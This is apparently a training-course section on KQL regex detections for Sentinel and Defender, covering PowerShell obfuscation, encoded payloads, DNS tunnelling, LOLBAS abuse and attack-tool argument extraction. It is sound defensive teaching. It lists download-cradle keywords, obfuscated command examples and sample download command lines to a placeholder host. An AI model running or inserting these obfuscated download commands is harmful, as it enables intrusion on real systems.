6.2 Advanced Regex Patterns for Security Analysis

4-5 hours · Module 6

What you already know

The previous section covered mv-expand and mv-apply, working with dynamic arrays. This section covers advanced regex patterns for security analysis.

Module 5 introduced basic regex extraction. This subsection covers the advanced patterns that detect obfuscation, encoding, and evasion techniques used by adversaries to bypass simple pattern-matching detection.

Detecting obfuscated PowerShell

Adversaries obfuscate PowerShell commands by inserting backticks and carets, substituting variables, and concatenating strings to break signature-based detection:

// Original: Invoke-WebRequest
// Obfuscated: In`vo`ke-We`bR`eq`uest
// Obfuscated: $a='Invoke';$b='WebRequest';iex "$a-$b"
// Obfuscated: [char]73+[char]110+[char]118... (char codes)

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "powershell.exe"
// Step 1: Remove common obfuscation characters
| extend CleanCmd = replace_regex(ProcessCommandLine, @"[`^]", "")
// Step 2: Check cleaned command for suspicious patterns
| where CleanCmd has_any ("Invoke-WebRequest", "Invoke-Expression", "DownloadString",
    "DownloadFile", "Net.WebClient", "Start-Process", "IEX", "New-Object")
    or ProcessCommandLine matches regex @"(?i)\[char\]\d+" // Char code obfuscation (PowerShell type names are case-insensitive)
    or ProcessCommandLine matches regex @"\$\w+='.+?';\$\w+='.+?'" // Variable concatenation
| extend ObfuscationType = case(
    // contains, not has: has matches whole terms, and these characters sit inside words
    ProcessCommandLine contains "`", "Backtick insertion",
    ProcessCommandLine matches regex @"(?i)\[char\]\d+", "Char code encoding",
    ProcessCommandLine matches regex @"\$\w+='.+?';\$\w+='.+?'", "Variable concatenation",
    ProcessCommandLine contains "^", "Caret insertion",
    strlen(ProcessCommandLine) > 500 and countof(ProcessCommandLine, "+") > 10, "String concatenation",
    "Other/Multiple"
)
| project TimeGenerated, DeviceName, ObfuscationType, 
    CmdPreview = substring(ProcessCommandLine, 0, 200)

The two-step approach (clean, then match) defeats simple obfuscation. The obfuscation type classification helps the analyst gauge the adversary's sophistication: backtick insertion is script-kiddie level, char code encoding suggests automated tooling, and multi-technique obfuscation suggests a skilled operator. Note that case() returns the first matching branch, so a command that combines several techniques is labelled by whichever check comes first.
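To see why the cleaning step matters, the clean-then-match idea can be tried on a few made-up command lines. This is a minimal sketch: the sample strings and the example.test host are hypothetical, not real telemetry.

```kql
// Hypothetical sample command lines for illustration only
datatable(ProcessCommandLine:string) [
    "powershell In`vo`ke-We`bR`eq`uest http://example.test/a.ps1",
    "powershell I^nvoke-Ex^pression $payload",
    "powershell Get-ChildItem C:\\Temp"
]
// Step 1: strip backticks and carets
| extend CleanCmd = replace_regex(ProcessCommandLine, @"[`^]", "")
// Step 2: compare matching on the raw and the cleaned command line
| extend MatchesRaw = ProcessCommandLine has_any ("Invoke-WebRequest", "Invoke-Expression")
| extend MatchesClean = CleanCmd has_any ("Invoke-WebRequest", "Invoke-Expression")
| project ProcessCommandLine, CleanCmd, MatchesRaw, MatchesClean
```

The first two rows should match only after cleaning, which is the gap that signature matching on the raw command line leaves open.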

Regex for detecting encoding and compression

DeviceProcessEvents
| where TimeGenerated > ago(24h)
// The three checks are alternatives, so they are combined with "or";
// separate where clauses would require all three to match at once
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{100,}={0,2}"  // Base64 payload (long run of base64 characters)
    or ProcessCommandLine matches regex @"(?:0x)?[0-9A-Fa-f]{50,}"     // Hex-encoded payload
    // gzip magic bytes in base64 (starts with H4sI); contains_cs because
    // H4sI is the prefix of a longer token and base64 is case-sensitive
    or ProcessCommandLine contains_cs "H4sI"

The gzip magic bytes pattern (H4sI) is particularly useful — H4sI is the base64 representation of the gzip header bytes \x1f\x8b\x08. Adversaries compress and base64-encode their payloads to reduce size and evade detection. Finding H4sI in a command line indicates a compressed payload that needs decompression for analysis.
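Once an H4sI blob is found, it can often be decompressed in the query itself. The sketch below builds a hypothetical command line from a made-up payload, then extracts and decodes the blob. It assumes the payload text is UTF-8, which real adversary payloads may not be.

```kql
// Made-up payload, compressed here only to produce a realistic H4sI blob
let SamplePayload = "Write-Output 'hypothetical payload'";
print ProcessCommandLine = strcat("powershell -c $d='", gzip_compress_to_base64_string(SamplePayload), "'")
// Pull out the base64 run that starts with the gzip magic prefix
| extend Blob = extract(@"(H4sI[A-Za-z0-9+/]+={0,2})", 1, ProcessCommandLine)
// Decode base64 and decompress gzip in one step
| extend Decompressed = gzip_decompress_from_base64_string(Blob)
| project Blob, Decompressed
```

Against real data, the same two extend lines can follow a filter on DeviceProcessEvents. An empty Decompressed value suggests a different encoding or a truncated command line.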

Negative regex patterns: detecting what SHOULD be there but is NOT

// Executable extensions written outside the standard Windows and Program Files directories
DeviceFileEvents
| where TimeGenerated > ago(24h)
| where FileName matches regex @"(?i)\.(exe|dll|sys|scr|com)$"
| where FolderPath !has "\\Windows\\" and FolderPath !has "\\Program Files"
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256

// PowerShell -File targets that do not use a standard script extension
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has "-File"
| extend ScriptPath = extract(@"-File\s+""?([^""]+)""?", 1, ProcessCommandLine)
| where isnotempty(ScriptPath)
// Negate with not(...); (\s|$) tolerates arguments that follow an unquoted path
| where not(ScriptPath matches regex @"(?i)\.(ps1|psm1|psd1)(\s|$)")  // Non-standard extension
| project TimeGenerated, DeviceName, ScriptPath

Regex for protocol and network pattern detection

// Detect DNS over HTTPS (DoH) domains in network traffic
DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl matches regex @"https://(cloudflare-dns\.com|dns\.google|doh\.opendns\.com|dns\.quad9\.net)"
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP
// DoH can be used by adversaries to exfiltrate data or resolve C2 infrastructure
// without the DNS queries appearing in standard DNS logs

// Detect data in DNS queries (DNS tunnelling indicator)
DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemotePort == 53
| where RemoteUrl matches regex @"[a-z0-9]{30,}\."  // Very long subdomain labels
| extend SubdomainLength = strlen(extract(@"^([^.]+)", 1, RemoteUrl))
| where SubdomainLength > 30
| project TimeGenerated, DeviceName, RemoteUrl, SubdomainLength

DNS tunnelling encodes data in DNS query subdomains. Excessively long subdomain labels (30+ characters of hex or base64) indicate possible data exfiltration via DNS; normal labels are typically under 20 characters.
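Encoded data does not always sit in the first label, so a variant worth considering measures the longest label anywhere in the name. This is a sketch on hypothetical query names, reusing mv-apply from the previous section; the 30-character threshold is the one used above.

```kql
// Hypothetical query names for illustration only
datatable(RemoteUrl:string) [
    "www.example.test",
    "cdn.4a6f686e20446f6520736563726574206461746120.example.test"
]
// Split the name into labels and keep the length of the longest one
| extend Labels = split(RemoteUrl, ".")
| mv-apply Label = Labels to typeof(string) on (
    summarize MaxLabelLength = max(strlen(Label))
)
| extend Suspicious = MaxLabelLength > 30
| project RemoteUrl, MaxLabelLength, Suspicious
```

Only the second row should be flagged, even though its first label (cdn) is short. A single DNS label can be at most 63 characters, so tunnelling tools often spread data across several long labels.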

Living off the Land detection patterns

LOLBAS detection requires understanding how legitimate tools are abused:

// Certutil abuse — downloading files
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "certutil.exe"
| where ProcessCommandLine matches regex @"-(urlcache|decode|encode)\s"
| extend AbuseType = case(
    ProcessCommandLine has "-urlcache", "File Download",
    ProcessCommandLine has "-decode", "Base64 Decode",
    ProcessCommandLine has "-encode", "Base64 Encode",
    "Unknown"
)
| extend TargetURL = extract(@"-f\s+(\S+)", 1, ProcessCommandLine)
| extend OutputFile = extract(@"\s(\S+\.\w{2,4})$", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AbuseType, TargetURL, OutputFile, ProcessCommandLine

// Mshta abuse — executing HTA payloads
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "mshta.exe"
| where ProcessCommandLine matches regex @"(http|javascript:|vbscript:)"
| extend PayloadType = case(
    ProcessCommandLine has "http", "Remote HTA",
    ProcessCommandLine has "javascript:", "Inline JavaScript",
    ProcessCommandLine has "vbscript:", "Inline VBScript",
    "Unknown"
)

// Regsvr32 abuse — proxy execution
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "regsvr32.exe"
| where ProcessCommandLine has_any ("/s /n /u /i:http", "scrobj.dll")
| extend IsSquiblydoo = ProcessCommandLine has "scrobj.dll"

Each pattern targets a specific abuse technique. The regex extracts the adversary's parameters: the downloaded URL, the output file, the payload type, giving the analyst the investigation context without needing to manually parse the command line.

Regex anti-patterns to avoid

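Anti-pattern 1: Greedy matching on log data. The regex .* is greedy: it matches as much as possible. On a 5,000-character command line, extract(@"start(.*)end", 1, cmd) runs to the last occurrence of end, so it scans the whole string and captures far more than intended. KQL's regex engine (RE2) avoids catastrophic backtracking, so the main cost is over-capture and wasted scanning.

// GREEDY: .+ runs to the last " -" on the line and over-captures
| extend ScriptArg = extract(@"-File (.+) -", 1, ProcessCommandLine)

// TIGHTER: non-greedy .+? or a negated character class
| extend ScriptArg = extract(@"-File (.+?) -", 1, ProcessCommandLine)
| extend ScriptArg = extract(@"-File (\S+)", 1, ProcessCommandLine)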
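The difference between the three forms is easiest to see side by side. A minimal sketch on one hypothetical command line:

```kql
// Hypothetical command line for illustration only
datatable(ProcessCommandLine:string) [
    "powershell.exe -File C:\\Temp\\run.ps1 -Mode fast -Verbose"
]
// Greedy: runs to the last " -" and swallows the following argument
| extend Greedy = extract(@"-File (.+) -", 1, ProcessCommandLine)
// Non-greedy: stops at the first " -"
| extend Lazy = extract(@"-File (.+?) -", 1, ProcessCommandLine)
// Character class: stops at the first whitespace
| extend Bounded = extract(@"-File (\S+)", 1, ProcessCommandLine)
| project Greedy, Lazy, Bounded
```

Greedy should include the trailing -Mode fast argument, while Lazy and Bounded should return only the script path. The \S+ form assumes the path contains no spaces; quoted paths with spaces need the quoted-string pattern instead.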

Anti-pattern 2: Regex for simple matching. Using matches regex @"mimikatz" is slower than has "mimikatz". Regex is for patterns; has, contains, and in are for literal matching.

Anti-pattern 3: Unbounded quantifiers. [A-Za-z0-9]+ without length bounds matches the entire string if it is all alphanumeric. Add bounds that fit the data: [A-Fa-f0-9]{64} for SHA-256 hashes, [A-Za-z0-9+/]{20,} for base64 payloads.

Command-line argument extraction patterns

Standard patterns for extracting arguments from common attack tools:

// Mimikatz: extract the module and command
| extend MimikatzModule = extract(@"(?:mimikatz|sekurlsa|kerberos|lsadump)::(\w+)", 1, ProcessCommandLine)

// PsExec: extract the target host (two leading backslashes, then the host name)
| extend PsExecTarget = extract(@"\\\\([^\s\\]+)", 1, ProcessCommandLine)

// WMI: extract the target and command
| extend WMITarget = extract(@"/node:""?(\S+?)""?\s", 1, ProcessCommandLine)
| extend WMICommand = extract(@"process\s+call\s+create\s+""(.+?)""", 1, ProcessCommandLine)

// Scheduled task: extract task name and command
| extend TaskName = extract(@"/tn\s+""?([^""]+?)""?\s", 1, ProcessCommandLine)
| extend TaskCommand = extract(@"/tr\s+""?([^""]+?)""?\s", 1, ProcessCommandLine)

// PowerShell download cradles
| extend DownloadURL = extract(@"(?:DownloadString|DownloadFile|Invoke-WebRequest|wget|curl)\s*\(?['""]?(https?://[^\s'""]+)", 1, ProcessCommandLine)

Maintain these patterns in a shared query library. When an alert fires for a suspicious process, the analyst applies the appropriate extraction pattern to immediately see the adversary's target, payload URL, or stolen data, without manually reading 500 characters of obfuscated command line.
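One way to keep such a library is to wrap each pattern in a function. The sketch below uses a let-defined function with a hypothetical name, ExtractDownloadUrl, and a made-up command line. In a workspace the same body could be saved as a stored function, which is an assumption about how the library is organised.

```kql
// Hypothetical helper name; the regex is the download-cradle pattern from above
let ExtractDownloadUrl = (cmd:string) {
    extract(@"(?:DownloadString|DownloadFile|Invoke-WebRequest|wget|curl)\s*\(?['""]?(https?://[^\s'""]+)", 1, cmd)
};
// Made-up command line for illustration only
datatable(ProcessCommandLine:string) [
    "powershell -c (New-Object Net.WebClient).DownloadString('http://example.test/stage2.ps1')"
]
| extend DownloadURL = ExtractDownloadUrl(ProcessCommandLine)
| project DownloadURL, ProcessCommandLine
```

Keeping the regex in one place means a fix to the pattern reaches every query that calls the function.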

Building a comprehensive obfuscation score

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe")
| extend ObfuscationScore = 
    // Character-level obfuscation
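    // contains, not has: these characters sit inside words, and has matches whole terms
    iff(ProcessCommandLine contains "`", 1, 0) +    // Backtick
    iff(ProcessCommandLine contains "^", 1, 0) +    // Caret
    iff(countof(ProcessCommandLine, "+") > 10, 1, 0) + // String concat
    // Encoding
    iff(ProcessCommandLine contains "-enc", 2, 0) + // Base64 encoded: -enc through -EncodedCommand (also hits -Encoding)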
    iff(ProcessCommandLine matches regex @"\[char\]\d+", 2, 0) + // Char codes
    iff(ProcessCommandLine has "FromBase64String", 2, 0) +
    // Evasion flags
    iff(ProcessCommandLine has "-nop", 1, 0) +      // No profile
    iff(ProcessCommandLine has "-w hidden", 1, 0) +  // Hidden window
    iff(ProcessCommandLine has "bypass", 1, 0) +     // Execution policy bypass
    // Suspicious operations
    iff(ProcessCommandLine has "IEX", 2, 0) +        // Invoke-Expression
    iff(ProcessCommandLine has "Net.WebClient", 2, 0) + // Download
    iff(ProcessCommandLine has "Invoke-", 1, 0)      // Generic Invoke
| where ObfuscationScore >= 4
| project TimeGenerated, DeviceName, ObfuscationScore,
    CmdPreview = substring(ProcessCommandLine, 0, 200)
| sort by ObfuscationScore desc

Score 4-6: moderate obfuscation, warrants review. Score 7+: heavy obfuscation, almost certainly adversary tooling. Score 10+: multiple encoding layers and evasion techniques, high-confidence malicious activity.
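The score bands can be attached to each row so the triage label travels with the result. A minimal sketch on hypothetical devices and scores; the label wording is illustrative.

```kql
// Hypothetical devices and scores for illustration only
datatable(DeviceName:string, ObfuscationScore:int) [
    "ws-001", 5,
    "ws-002", 8,
    "ws-003", 12
]
// case() returns the first matching branch, so test the highest band first
| extend Triage = case(
    ObfuscationScore >= 10, "High-confidence malicious",
    ObfuscationScore >= 7, "Heavy obfuscation",
    ObfuscationScore >= 4, "Moderate obfuscation, review",
    "Below threshold")
| project DeviceName, ObfuscationScore, Triage
```

In the scoring query, the same extend can follow the where ObfuscationScore >= 4 filter.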

Regex for log timestamp normalization

Third-party logs often contain timestamps in non-standard formats that need extraction and conversion:

Syslog
| where TimeGenerated > ago(1h)
| extend EmbeddedTimestamp = extract(@"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?)", 1, SyslogMessage)
| extend ParsedTime = todatetime(EmbeddedTimestamp)
| extend TimeDrift = datetime_diff('second', TimeGenerated, ParsedTime)
| where abs(TimeDrift) > 300  // More than 5 minutes drift between log timestamp and ingestion
| project TimeGenerated, ParsedTime, TimeDrift, Computer, SyslogMessage

Timestamp drift between the embedded event time and Sentinel's TimeGenerated (ingestion time) indicates either clock skew on the source device (a security concern, because attackers modify clocks to confuse forensic timelines) or ingestion delay (an operational concern, because it adds detection latency).

Regex for user-agent analysis in authentication logs

SigninLogs
| where TimeGenerated > ago(24h)
| where ResultType == "0"
| extend UAComponents = extract_all(@"(\w+/[\d.]+)", UserAgent)
| extend UALength = strlen(UserAgent)
| extend IsAutomated = UserAgent has_any ("python", "curl", "wget", "axios", "Go-http-client", "okhttp")
    or UALength < 20  // Very short UAs are typically automated
    or UALength > 500  // Extremely long UAs may be spoofed
| where IsAutomated
| summarize count() by UserAgent, UserPrincipalName
| sort by count_ desc

Automated User-Agents in authentication logs indicate scripted access (legitimate API clients), adversary tooling (Python requests library, custom HTTP clients), or legacy applications using basic authentication. Each warrants a different response, and automated detection with UA classification accelerates that decision.
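A first-pass classification can be sketched with case(). The class names and the grouping of tools below are assumptions for illustration. A User-Agent alone cannot separate a legitimate API client from adversary tooling, so the class only routes the sign-in to the right follow-up check.

```kql
// Hypothetical User-Agent strings for illustration only
datatable(UserAgent:string) [
    "python-requests/2.31.0",
    "curl/8.4.0",
    "okhttp/4.9.3",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
]
| extend UAClass = case(
    UserAgent has_any ("python", "curl", "wget", "Go-http-client"), "Scripting tool or HTTP library",
    UserAgent has_any ("axios", "okhttp"), "Application HTTP client",
    strlen(UserAgent) < 20, "Short or truncated",
    "Browser-like")
| project UserAgent, UAClass
```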

Build a PowerShell obfuscation detector that scores each command line based on the number of obfuscation techniques detected: backtick insertion, caret insertion, char code encoding, string concatenation (10+ "+" operators), variable substitution, and base64 encoding. Commands with 3+ techniques are high-confidence adversary activity.

NE environmental considerations

NE's detection environment includes specific factors that influence this rule's operation:

Device diversity: 768 P2 corporate workstations with full Defender for Endpoint telemetry, 58 P1 manufacturing workstations with basic cloud-delivered protection, and 3 RHEL rendering servers with Syslog-only coverage. Rules targeting DeviceProcessEvents operate with full fidelity on P2 devices but may have reduced visibility on P1 devices. Manufacturing workstations in Sheffield and Sunderland represent a detection gap for endpoint-level detections.

Network topology: 11 offices connected via Palo Alto SD-WAN with full-mesh connectivity. The SD-WAN firewall logs feed CommonSecurityLog in Sentinel. Cross-site lateral movement generates firewall allow events that correlate with DeviceLogonEvents, enabling multi-source detection that single-table rules cannot achieve.

User population: 810 users with distinct behavioral profiles, office workers (predictable hours, consistent applications), field engineers (variable hours, travel patterns), IT administrators (elevated privilege, broad access patterns), and manufacturing operators (fixed shifts, limited application access). Each user population has different detection baselines.

Anti-Pattern

Using advanced regex patterns for security analysis without understanding the output

The query runs. The results look reasonable. The analyst trusts the output without verifying it against the raw data. Every KQL operator transforms data, and every transformation can mask, distort, or omit information if the operator is misused. Validate query results against known-good data before building detection rules or investigation conclusions on them.

Troubleshooting

"The query returns an error I do not understand." KQL error messages reference the specific line and operator that failed. Read the error message from left to right: it names the operator, the expected input type, and the actual input type. Most errors are type mismatches (passing a string where a datetime is expected) or field name typos. The getschema operator shows every field name and type for any table: TableName | getschema.

"The query runs but returns unexpected results." Add | take 10 after each operator in the pipeline and examine the intermediate output. This reveals WHERE the data transforms in a way you did not expect. Debug the pipeline stage by stage, not the entire query at once.
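Both troubleshooting steps can be sketched against the table used throughout this subsection. The two queries below are meant to be run separately. The stage chosen for inspection is only an example.

```kql
// Query 1: list every column name and type before writing filters
DeviceProcessEvents
| getschema

// Query 2: stop the pipeline after one stage and inspect the intermediate output
DeviceProcessEvents
| where TimeGenerated > ago(1h)
| where FileName =~ "powershell.exe"
| extend CleanCmd = replace_regex(ProcessCommandLine, @"[`^]", "")
| project ProcessCommandLine, CleanCmd
| take 10   // Compare CleanCmd with ProcessCommandLine, then add the next operator
```

Moving the take 10 line down one operator at a time shows which stage drops or reshapes the rows.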

Section Reference

Operators covered in this subsection: Review the KQL examples above and add the patterns to your personal query library (K13). Each pattern is reusable across any Sentinel table for security investigation.